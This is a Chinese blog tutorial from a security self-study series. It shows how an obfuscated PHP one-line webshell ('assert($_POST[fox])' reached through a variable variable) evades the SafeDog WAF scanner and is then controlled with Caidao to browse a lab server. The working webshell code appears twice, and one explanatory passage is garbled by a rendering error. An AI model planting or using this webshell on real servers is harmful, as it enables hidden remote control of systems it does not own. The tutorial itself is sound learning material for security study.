[网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)

这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合Caidao工具介绍拿站的流程及防御原理。本篇文章将介绍绕狗一句话原理、绕过安全狗的常用方法和过狗菜刀,并实践安装安全狗进行实际测试。这是文件上传漏洞系列的最后一篇博客,不知道有没有帮助到大家。希望博友们一定要去试试Upload-labs靶场的20道题目。

作者作为网络安全的小白,分享一些自学基础教程给大家,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力。

PS:本文参考了B站、51CTO学院(Fox老师)和参考文献中的文章,并结合自己的经验进行撰写,也推荐大家阅读参考文献。

下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study
资源下载地址:

前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向破解
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
[网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
[网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防护
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
[网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
[网络安全自学篇] 二十.Powershell基础入门及常见用法(二)
[网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
[网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
[网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防御原理(一)
[网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防御原理(二)
[网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)
[网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10(四)
[网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20(五)

前文欣赏:
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差异备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包

该篇文章参考了以下文献,非常推荐大家阅读这些大牛的文章和视频:
https://github.com/eastmountyxz
《Web安全深度剖析》《黑客攻防技术宝典浏览器实战篇》
https://www.bilibili.com/video/av60018118 (B站白帽黑客教程)
2019/Web安全/漏洞挖掘/信息收集/SQLMAP/SSRF/文件上传/逻辑漏洞 (B站强推)
2019文件上传漏洞专题渗透入门网络安全黑客web攻防详解 (Fox B站强推)
https://github.com/c0ny1/upload-labs
百度百科 - 安全狗
http://www.safedog.cn/index/publicCloudIndex.html

声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。


一.防火墙及安全狗

防火墙技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备,帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障,以保护用户资料与信息安全性的一种技术。

防火墙技术的功能主要在于及时发现并处理计算机网络运行时可能存在的安全风险、数据传输等问题,其中处理措施包括隔离与保护,同时可对计算机网络安全当中的各项操作实施记录与检测,以确保计算机网络运行的安全性,保障用户资料与信息的完整性,为用户提供更好、更安全的计算机网络使用体验。

在这里插入图片描述

假设我们的phpStudy靶场存在一个“a.php”文件,如下图所示,它是一个常规的木马。

在这里插入图片描述

我们尝试访问“a.php”,但提示错误,因为它被防火墙或安全狗拦截了。

在这里插入图片描述


下面我们再分享下安全狗的概念。
安全狗以SECaaS安全即为用户提供一站式的云安全产品与服务,包括(云)主机安全、WEB应用安全、网站防篡改、抗DDoS云服务、安全大数据态势感知等。其基本功能包括:

  • 网站安全狗: 面向网站安全,包括网马扫描及查杀(自有引擎,只针对网页木马);网马主动防御功能(可主动拦截网马上传和访问的动作);防SQL注入功能、防XSS跨站攻击功能;防盗链防下载;以及防止CC攻击。
  • 服务器安全狗: 面向服务器安全的,包括基于内核驱动的抗DDOS攻击、抗ARP攻击、抗WEB CC攻击功能;基于内核驱动的文件系统主动保护功能(可防止文件被篡改、保护系统文件);基于内核驱动的服务器其他方面的主动防御功能(系统账号、注册表、远程登陆等方面的保护);以及服务器全面优化及体检功能。
  • 安全狗服云: 基于云端的监控和保护。安全狗服云利用云计算技术,为用户构造一个全面的服务器和网站的监控和防护平台,利用这个平台,用户可以做到24小时的服务器健康监控、资源监控和资源告警;24小时的服务器可用性监控;网站安全云扫描,发现网站存在的各种漏洞;基于云端技术的网站防篡改功能,保障网站文件不被非法修改。

在这里插入图片描述

接着我们下载安全狗并进行安装,如下图所示。

在这里插入图片描述

安装成功之后,包括网站防护、资源防护、IP黑白名单、防护日志四个核心功能。

在这里插入图片描述

在这里插入图片描述


二.绕狗一句话

假设我们存在一个“a.php”文件和“gou.php”文件。

在这里插入图片描述

其中“a.php”一句话木马如下图所示:

在这里插入图片描述

“gou.php”的代码如下:

在这里插入图片描述

<?php
	$a='b';
	$$a='assert';
	$b($_POST[fox]);
?>

点击网马查杀下面的“自定义路径扫描”按钮,如下图所示。

在这里插入图片描述

接着选择指定目录,这里使我们phpStudy的靶场“WWW/gou”文件夹。

在这里插入图片描述

其扫描结果是,它发现了我们的PHP一句话木马,却没有发现绕狗一句话。

在这里插入图片描述

木马提示如下图所示:

在这里插入图片描述

我们的“dog.php”没有被发现了,并且能够直接访问,接下来我们利用中国菜刀和狗刀进行连接,并解释其工作原理。

在这里插入图片描述


三.绕狗一句话原理

绕狗一句话木马代码如下:

<?php
	$a='b';
	$$a='assert';
	$b($_POST[fox]);
?>

这里的“$$a=‘assert’;”其实就是“$b”,由于没有直接对“KaTeX parse error: Undefined control sequence: \b at position 1: \̲b̲”进行赋值,所以安全狗不会提示…_POST[fox])”,其实就是一句话木马。紧接着我们尝试用Caidao进行连接。

注意,这里这里我们远程服务器上传的绕狗一句话文件叫“dog.php”。

在这里插入图片描述

这里提示安全狗拦截,如下图所示:

在这里插入图片描述

下图可以看到,中国菜刀成功获取了服务器的文件目录。

在这里插入图片描述

接着尝试用狗刀进行连接。

在这里插入图片描述

连接的URL如下所示,密码为“fox”(fox老师的名称)。

在这里插入图片描述

最终也成功获取了服务器的目录。

在这里插入图片描述

接着尝试利用WSExplorer工具进行抓包,对比“中国菜刀”和“狗刀”的流量。

在这里插入图片描述
在这里插入图片描述

将数据包复制到记事本中,进行对比,上面是“中国菜刀”获取的数据包,下面是“狗刀”获取的数据包。

在这里插入图片描述

将z0和z1提取出来,如下图所示,通常会搜索%然后转换“=”、“+”等字符。

在这里插入图片描述

从Cracer安全工具中找到转码工具。

在这里插入图片描述

Base64转码的结果如下图所示:

在这里插入图片描述

“中国菜刀”流量的转码结果如下:

在这里插入图片描述

“狗刀”流量的转码结果如下:

在这里插入图片描述

两段流量不同的地方如下:
在这里插入图片描述

这里建议尝试自己去抓包分析下过狗菜刀的原理,然后编写属于自己的代码。通过过狗成功绕过并控制了整个C盘,对于我们提权有很大的帮助。

在这里插入图片描述


四.总结

写到这里,这篇基础性文章就此结束,最后希望这篇基础性文章对您有所帮助。突然发现,作者已经写了400篇文章了,非常值得纪念,今后也希望帮到更多的读者。也觉得自己的技术好浅,要学的知识好多,希望读博四年能不断成长吧。最后祝明天所有考研学子都取得好成绩,不负青春~

(By:Eastmount 2019-12-20 晚上10点写于武大 http://blog.csdn.net/eastmount/ )

发布了416 篇原创文章 · 获赞 5065 · 访问量 424万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 书香水墨 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览